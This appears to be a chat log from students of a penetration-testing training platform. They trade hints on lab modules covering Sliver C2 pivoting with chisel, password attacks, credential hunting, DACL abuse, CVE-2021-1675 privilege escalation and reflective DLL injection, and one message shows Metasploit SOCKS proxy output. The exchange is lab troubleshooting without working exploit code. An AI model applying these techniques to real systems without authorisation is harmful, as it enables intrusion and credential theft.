Somehow, I got it to work. This only thing different was I checked TCP and not UDP. Thanks for the help, hope I can do the same for some one else.
hi guys im doing introduction to c2 operations with sliver and Im stuck in the pivoting section.
I compiled the sliver extension as instructed in the content but when I try to connect to my chisel server on the pwnbox it says chisel version differs.
To anyone who completed it what chisel server did you use?
Just solved it, feel free to dm.
just sent you a dm 🙏
the .zip with the usernames etc
Password reuse
Password attacks was updated, that old 4 hours cracking was replaced with much easier hash and scenario
aaaa
Maybe thats the reason Some of my modules have been bugged.
Im completely blanking on what the command is to look at messages in IMAP, can i get a little help?
can i open you dm
Sure
Hi People! New day - new attempt. Anyone for a hint on Password Attacks module? I need help on the second question of the Credential Hunting in Network Shares page.
Sure
|| Use all tools mentioned in the page ||
|| IT share has some 'juicy' info if it is still there, felt unintended ||
Well... ||I must be too lost, cause I know what do u mean about Juicy info, and I have used all of the tools... May be I miss smth...||
Anyway, thx, I'll keep trying
Information Gathering - Web Edition skills assessment. question : What is the API key in the hidden admin directory that you have discovered on the target system? . I found the API key, but for some reason, it's giving me that the key is wrong. I restarted the thing, and again, the same problem
Need some help, with Windows Event Logs & Finding evil. I'm following the steps to conduct the Dll Reflective attack, but I'm having an issue trying to move calc to the desktop.
Dm if you are still lost
Mostly it is a space that managed to slip in
solved
Hello everyone, I am having trouble learning Windows Privilege Escalation Skills Assessment - Part I and am unsure how to locate CVE-2021-1675 for attack. How to determine if this vulnerability is being used to increase privileges
Howdy, can anyone give me a hint how to solve this? DACL II - Logon scripts: Abuse the rights of the user 'Julio' and submit the flag in 'C:\Users\Benjamin\Desktop\flag.txt'. Cant really find any edges between Julio and Benjamin (and not Wayne that was pwned in Q1).
currently have a really weird issue....i can reach the VM (pub ip) via the browser, but when i curl or use hydra it can't reach it
nvm when restarting with a new service port it worked
probably issue with the vm
Yo
Do any of you guys know the solution to this ?
yo guys i cant run proxy server on msf
```
srvport => 9050
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
[*] Stopping the SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > jobs
Jobs
====
No active jobs.
```
keeps stopping by itself
r u using dual displays or something ?
No I'm trying to rdp into DC1
Don't solely rely on bloodhound for enumeration.
I’m on the analyzing network traffic part of the password attacks. How do I install pcreds? I used git clone already, what steps am I missing?
It shows two ways, either via docker or not via docker.
i mean does ur setup contains multiple monitors ?
I’m using wireshark I got the plain text credit card info am I supposed to put it in a certain format ?
I'd try it how you found it, if that doesn't work, I'd then try it as a how a normal credit card number is displayed on a card.
I figured it out. thanks
Hi, guys. hope everything goes well !
I'm in the skills assessment of the Linux privilege escalation module of the CPTS, but when I try to connect to the machine of the assessment, I always get a broken pipe. Does anybody have the same issue?

